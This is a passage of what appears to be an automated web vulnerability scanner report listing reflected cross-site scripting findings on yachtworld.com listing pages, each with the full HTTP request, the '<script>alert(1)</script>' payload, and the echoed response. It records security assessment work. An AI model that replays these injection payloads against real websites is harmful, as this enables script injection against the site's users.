GET /core/listing/photo_gallery.jsp?slim=broker&lang=en&ywo=starlingmarine&hosturl=starlingmarinef9bce<script>alert(1)</script>8e02e871271&units=Feet&id=2047906&back=/core/listing/pl_boat_detail.jsp&boat_id=2047906 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:31:07 GMT
Server: Apache
Cache-Control: private
Content-Length: 5980
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarinef9bce<script>alert(1)</script>8e02e871271/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarinef9bce<script>
...[SNIP]...

3.422. http://www.yachtworld.com/core/listing/photo_gallery.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photo_gallery.jsp

Issue detail

The value of the slim request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 51c92><script>alert(1)</script>52a8f864566 was submitted in the slim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/photo_gallery.jsp?slim=broker51c92><script>alert(1)</script>52a8f864566&lang=en&ywo=starlingmarine&hosturl=starlingmarine&units=Feet&id=2047906&back=/core/listing/pl_boat_detail.jsp&boat_id=2047906 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:30:53 GMT
Server: Apache
Cache-Control: private
Content-Length: 10663
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starli
...[SNIP]...
<a href=/core/listing/pl_boat_detail.jsp?slim=broker51c92><script>alert(1)</script>52a8f864566&boat_id=2047906&checked_boats=2047906&hosturl=starlingmarine&&ywo=starlingmarine&&ybw=&units=Feet&access=Public&listing_id=76926&url=>
...[SNIP]...

3.423. http://www.yachtworld.com/core/listing/photo_gallery.jsp [units parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photo_gallery.jsp

Issue detail

The value of the units request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b9ede><script>alert(1)</script>94f74025176 was submitted in the units parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/photo_gallery.jsp?slim=broker&lang=en&ywo=starlingmarine&hosturl=starlingmarine&units=Feetb9ede><script>alert(1)</script>94f74025176&id=2047906&back=/core/listing/pl_boat_detail.jsp&boat_id=2047906 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:31:30 GMT
Server: Apache
Cache-Control: private
Content-Length: 10663
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starli
...[SNIP]...
<a href=/core/listing/pl_boat_detail.jsp?slim=broker&boat_id=2047906&checked_boats=2047906&hosturl=starlingmarine&&ywo=starlingmarine&&ybw=&units=Feetb9ede><script>alert(1)</script>94f74025176&access=Public&listing_id=76926&url=>
...[SNIP]...

3.424. http://www.yachtworld.com/core/listing/photo_gallery.jsp [ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photo_gallery.jsp

Issue detail

The value of the ywo request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4eb0d><script>alert(1)</script>512094b2478 was submitted in the ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/photo_gallery.jsp?slim=broker&lang=en&ywo=starlingmarine4eb0d><script>alert(1)</script>512094b2478&hosturl=starlingmarine&units=Feet&id=2047906&back=/core/listing/pl_boat_detail.jsp&boat_id=2047906 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:30:57 GMT
Server: Apache
Cache-Control: private
Content-Length: 10663
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starli
...[SNIP]...
<a href=/core/listing/pl_boat_detail.jsp?slim=broker&boat_id=2047906&checked_boats=2047906&hosturl=starlingmarine&&ywo=starlingmarine4eb0d><script>alert(1)</script>512094b2478&&ybw=&units=Feet&access=Public&listing_id=76926&url=>
...[SNIP]...

3.425. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the &hosturl request parameter is copied into the HTML document as plain text between tags. The payload 83b1e<script>alert(1)</script>3ec26c09c89 was submitted in the &hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2223519&lang=en&slim=broker&&hosturl=starlingmarine83b1e<script>alert(1)</script>3ec26c09c89&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.2.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155874806%7C1298747874806%3B%20s_lv%3D1296155874808%7C1390763874808%3B%20s_lv_s%3DFirst%2520Visit%7C1296157674808%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:40 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 9065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine83b1e<script>alert(1)</script>3ec26c09c89/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine83b1e<script>
...[SNIP]...

3.426. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the &hosturl request parameter is copied into an HTML comment. The payload 1899d--><script>alert(1)</script>969fddb6318 was submitted in the &hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2223519&lang=en&slim=broker&&hosturl=starlingmarine1899d--><script>alert(1)</script>969fddb6318&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.2.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155874806%7C1298747874806%3B%20s_lv%3D1296155874808%7C1390763874808%3B%20s_lv_s%3DFirst%2520Visit%7C1296157674808%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:41 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 9118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script>alert(1)</script>969fddb6318/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine1899d-->
...[SNIP]...

3.427. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the &hosturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e67a9"><script>alert(1)</script>b34780de9a4 was submitted in the &hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2223519&lang=en&slim=broker&&hosturl=starlingmarinee67a9"><script>alert(1)</script>b34780de9a4&&ywo=starlingmarine& HTTP/1.1
